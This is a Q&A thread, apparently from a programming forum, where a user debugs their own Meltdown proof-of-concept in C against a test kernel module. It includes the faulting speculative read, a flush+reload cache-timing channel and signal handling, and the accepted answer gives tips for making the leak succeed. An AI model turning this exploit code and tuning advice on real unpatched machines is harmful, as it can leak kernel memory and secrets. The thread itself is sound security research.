Encouraging the CPU to perform out of order execution for a Meltdown test

Question

I am attempting to exploit the meltdown security flaw on Ubuntu 16.04, with an unpatched kernel 4.8.0-36 on an Intel Core-i5 4300M CPU.

First, I am storing the secret data at an address in kernel space using a kernel module :

static __init int initialize_proc(void){
    char* key_val = "abcd";
    printk("Secret data address = %p\n", key_val);
    printk("Value at %p = %s\n", key_val, key_val);
}

The printk statement gives me the address of the secret data.

Mar 30 07:00:49 VM kernel: [62055.121882] Secret data address = fa2ef024
Mar 30 07:00:49 VM kernel: [62055.121883] Value at fa2ef024 = abcd

I then attempt to access the data at this location and in the next instruction use it to cache an element of an array.

// Out of order execution
int meltdown(unsigned long kernel_addr){
    char data = *(char*) kernel_addr;   //Raises exception
    array[data*4096+DELTA] += 10;       // <----- Execute out of order
}

I am expecting the CPU to go ahead and cache the array element at index (data*4096 +DELTA) when performing out of order execution. After this, a bounds check is performed and SIGSEGV is thrown. I handle the SIGSEGV and then time the access to the array elements to determine which one has been cached:

void attackChannel_x86(){
    register uint64_t time1, time2;
    volatile uint8_t *addr;
    int min = 10000;
    int temp, i, k;

    for(i=0;i<256;i++){
        time1 = __rdtscp(&temp);      //timestamp before memory access
        temp = array[i*4096 + DELTA];
        time2 = __rdtscp(&temp) - time1; // change in timestamp after the access
        if(time2<=min){
            min = time2;
            k=i;
        }

    }
    printf("array[%d*4096+DELTA]\n", k);
}

Since the value in data is ‘a’, I am expecting the result to be array[97*4096 + DELTA] since ASCII value of ‘a’ is 97.

However, this is not working and I am getting random outputs.

~/.../MyImpl$ ./OutofOrderExecution 
Memory Access Violation
array[241*4096+DELTA]

~/.../MyImpl$ ./OutofOrderExecution 
Memory Access Violation
array[78*4096+DELTA]

~/.../MyImpl$ ./OutofOrderExecution 
Memory Access Violation
array[146*4096+DELTA]

~/.../MyImpl$ ./OutofOrderExecution 
Memory Access Violation
array[115*4096+DELTA]

The possible reasons I could think of are:

The instruction caching the array element is not getting executed out of order.
Out of order execution is occurring but the cache is being flushed.
I have misunderstood the mapping of memory in the kernel module and the address I'm using is incorrect

Since the system is vulnerable to meltdown, I am certain that rules out the 2nd possibility.

Hence, my question is: Why is out of order execution not working here? Are there any options/flags that “encourage” the CPU to execute out of order ?

Solutions I’ve already tried:

Using clock_gettime instead of rdtscp for timing memory access.

void attackChannel(){
    int i, k, temp;

    uint64_t diff;
    volatile uint8_t *addr;
    double min  = 10000000;
    struct timespec start, end;

    for(i=0;i<256;i++){
        addr = &array[i*4096 + DELTA];
        clock_gettime(CLOCK_MONOTONIC, &start);
        temp = *addr;
        clock_gettime(CLOCK_MONOTONIC, &end);
        diff = end.tv_nsec - start.tv_nsec;
        if(diff<=min){
            min = diff;
            k=i;
        }
    }
    if(min<600)
        printf("Accessed element : array[%d*4096+DELTA]\n", k);
}

Keeping the arithmetic units “busy” by executing a loop (see meltdown_busy_loop)

void meltdown_busy_loop(unsigned long kernel_addr){
    char kernel_data;
    asm volatile(
        ".rept 1000;"
        "add $0x01, %%eax;"
        ".endr;"

        :
        :
        :"eax"
    );
    kernel_data = *(char*)kernel_addr;
    array[kernel_data*4096 + DELTA] +=10;
}

Using procfs to force the data into the cache before performing a time attack (see meltdown)

int meltdown(unsigned long kernel_addr){   
    // Cache the data to improve success
    int fd = open("/proc/my_secret_key", O_RDONLY);
    if(fd<0){
        perror("open");
        return -1;
    }
    int ret = pread(fd, NULL, 0, 0);    //Data is cached
    char data = *(char*) kernel_addr;   //Raises exception
    array[data*4096+DELTA] += 10;       // <----- Out of order
}

For anyone interested in setting it up, here is the link to the github repo

For the sake of completeness, I am appending the main function and error handling code below:


void flushChannel(){
    int i;
    for(i=0;i<256;i++) array[i*4096 + DELTA] = 1;

    for(i=0;i<256;i++) _mm_clflush(&array[i*4096 + DELTA]);
}

void catch_segv(){
    siglongjmp(jbuf, 1);
}

int main(){
    unsigned long kernel_addr = 0xfa2ef024;
    signal(SIGSEGV, catch_segv);

    if(sigsetjmp(jbuf, 1)==0)
    {
        // meltdown(kernel_addr);
        meltdown_busy_loop(kernel_addr);
    }
    else{
        printf("Memory Access Violation\n");
    }

    attackChannel_x86();
}

Did you make sure that array does not reside in the CPU's cache before executing attackChannel_x86? — undercat
Also, it may be easier to debug your code by placing the string you want to sneak peek at inside the same (user-space) program. Once you get that simplified version working, you could move the string back into the kernel, confident that your basic Meltdown implementation is correct. — undercat
Clearing them from the cache is handled by the flushChannel() function. I am first operating on them to load them in the cache and then using _mm_clflush (software.intel.com/sites/landingpage/IntrinsicsGuide/…) to invalidate them. — BenKenobi007
@undercat It works 80% of the times when the string is in the same user space program. — BenKenobi007
Afaik the only difference between memory allocation in both the cases is that kthreads do not have an address space and write directly in the kernel space memory right ? And since the entire kernel address space is mapped for each process the address from the kernel module should point to the data when in user space too. Or am I missing something ? — BenKenobi007

Peter Cordes Peter Cordes · Accepted Answer · 2019-04-03T05:11:00

I think the data needs to be in L1d for Meltdown to work, and attempting to read it only through a TLB / page-table entry that doesn't have privileges won't bring it into L1d.

http://blog.stuffedcow.net/2018/05/meltdown-microarchitecture/

When any kind of bad outcome occurs (page fault, load from a non-speculative memory type, page accessed bit = 0), none of the processors initiate an off-core L2 request to fetch the data.

Unless there's something I'm missing, I think data is only vulnerable to Meltdown when something that is allowed to read it has brought it into L1d. (Directly or via HW prefetch.) I don't think repeated Meltdown attacks can bring data from RAM into L1d.

Try adding a system call or something to your module that uses READ_ONCE() on your secret data (or manually write *(volatile int*)&data; or just make it volatile so you can easily touch it) to bring it into cache from a context that does have privileges for that PTE.

Also: add $0x01, %%eax is a poor choice for delaying retirement. It's only 1 clock cycle of delay per uop, so OoO exec only has ~64 cycles from when the first instruction after the ADDs can enter the scheduler (RS) and run, before it chews through the adds and the faulting loads reach retirement.

At least use imul (3c latency), or better use xorps %xmm0,%xmm0 / repeated sqrtpd %xmm0,%xmm0 (single uop, 16 cycle latency on your Haswell.) https://agner.org/optimize/.

Encouraging the CPU to perform out of order execution for a Meltdown test

1 Answers